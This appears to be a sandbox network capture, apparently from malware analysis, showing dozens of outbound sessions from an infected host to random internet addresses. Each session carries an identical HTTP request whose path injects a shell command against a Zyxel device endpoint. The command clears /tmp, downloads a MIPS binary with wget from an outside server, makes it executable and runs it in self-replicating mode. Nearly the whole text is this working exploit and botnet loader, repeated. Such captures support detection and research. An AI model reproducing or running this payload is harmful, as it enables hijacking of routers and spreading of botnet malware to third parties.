                                            Jan 14, 2024 15:50:43.494326115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5524192.168.2.2359658133.227.151.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494349957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5525192.168.2.2356186210.130.145.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494354963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5526192.168.2.2351296126.245.207.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494390011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5527192.168.2.2353078176.29.22.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494424105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5528192.168.2.235042295.196.1.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494436026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5529192.168.2.234876671.220.241.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494493961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5530192.168.2.2354894113.240.218.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494504929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5531192.168.2.234366854.244.169.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494529009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5532192.168.2.235694645.34.238.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494553089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5533192.168.2.2357164134.179.34.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494602919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5534192.168.2.2358030188.42.181.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494632959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5535192.168.2.2359890207.184.219.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494645119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5536192.168.2.2334096117.239.189.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494689941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5537192.168.2.2348288148.74.17.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494700909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5538192.168.2.235132863.3.115.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494746923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5539192.168.2.233731470.202.161.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494786024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5540192.168.2.2345474120.14.89.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494810104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5541192.168.2.2357038104.31.66.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494847059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5542192.168.2.2339120141.248.192.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494883060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5543192.168.2.2341072175.56.62.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494909048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5544192.168.2.235151425.85.166.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494916916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5545192.168.2.233436644.100.245.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494942904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5546192.168.2.235906463.196.67.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.494966030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5547192.168.2.2359598145.172.105.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495006084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5548192.168.2.2349290140.160.104.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495034933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5549192.168.2.2346984146.35.44.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495070934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5550192.168.2.236015261.136.199.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495110989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5551192.168.2.2333470173.207.19.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495136023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5552192.168.2.234233227.28.123.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495186090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5553192.168.2.235818213.200.227.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495208979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5554192.168.2.2336428179.18.84.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495242119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5555192.168.2.2358100155.75.0.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495280027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5556192.168.2.235537638.83.214.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495312929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5557192.168.2.2339308101.48.92.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495362043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5558192.168.2.234988282.145.149.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495395899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5559192.168.2.2360230113.44.124.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495409012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5560192.168.2.2337646195.136.207.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495435953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5561192.168.2.2355876114.184.141.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495471954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5562192.168.2.2346918140.217.114.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495479107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5563192.168.2.236085081.190.194.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495517969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5564192.168.2.235408245.50.142.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495548964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5565192.168.2.2351760195.198.14.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495572090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5566192.168.2.235219679.137.53.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495572090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5567192.168.2.23367608.104.132.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495613098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5568192.168.2.236040688.112.35.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495671034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5569192.168.2.2359232180.68.169.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495718002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5570192.168.2.234709494.44.133.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495739937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5571192.168.2.2348850136.118.48.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495758057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5572192.168.2.234806482.168.118.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495795965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5573192.168.2.2345260104.218.121.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495834112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5574192.168.2.233784425.59.109.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495855093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5575192.168.2.2355102213.118.114.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495887041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5576192.168.2.2335554209.13.164.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495945930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5577192.168.2.2357742151.227.203.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495966911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5578192.168.2.233473858.161.252.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.495974064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5579192.168.2.234177841.228.108.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.496009111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5580192.168.2.2354460187.168.3.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.496042013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5581192.168.2.2342482182.85.125.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.496062040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5582192.168.2.2346000213.118.112.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.496083021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5583192.168.2.2344292134.157.5.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.496120930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5584192.168.2.2360712163.50.115.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.496160984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5585192.168.2.235571423.7.247.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:43.496177912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5586192.168.2.2357944177.244.81.91443
                                            TimestampBytes transferredDirectionData
